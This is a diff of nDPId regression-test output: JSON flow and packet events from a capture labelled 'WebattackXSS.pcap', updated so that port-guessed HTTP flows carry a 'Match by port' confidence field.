 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="}
@@ -2624,17 +2624,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6527,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1499347749751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347749751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IJFAAD4GpT+sEAABwKgKMux0AFD35MM7AAAAAKACchDSOAAAAgQFtAQCCAoBO+OqAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6528,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":2,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347749752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7HSHR7QM9+TDPKAScSDevgAAAgQFtAQCCAoD5bUfATvjqgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":3,"flow_last_seen":1499347749752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347749752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IJJAAD4GpUasEAABwKgKMux0AFD35MM8h0e0DYAQAOV9xgAAAQEICgE746oD5bUf"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347625094,"flow_last_seen":1499347630791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752044,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347752308,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347752308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347752308,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qStAAD4GHKWsEAABwKgKMuyOAFBMoE8CAAAAAKACchDvHQAAAgQFtAQCCAoBO+YpAAAAAAEDAwc="}
@@ -2660,17 +2660,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347761418,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apdAAD4GWzmsEAABwKgKMuzsAFC\/aIWYAAAAAKACchA8ewAAAgQFtAQCCAoBO+8PAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":2,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347761418,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7OwFUgVYv2iFmaAScSBuRgAAAgQFtAQCCAoD5cCEATvvDwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":3,"flow_last_seen":1499347761419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347761419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aphAAD4GW0CsEAABwKgKMuzsAFC\/aIWZBVIFWYAQAOUNTgAAAQEICgE77w8D5cCE"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
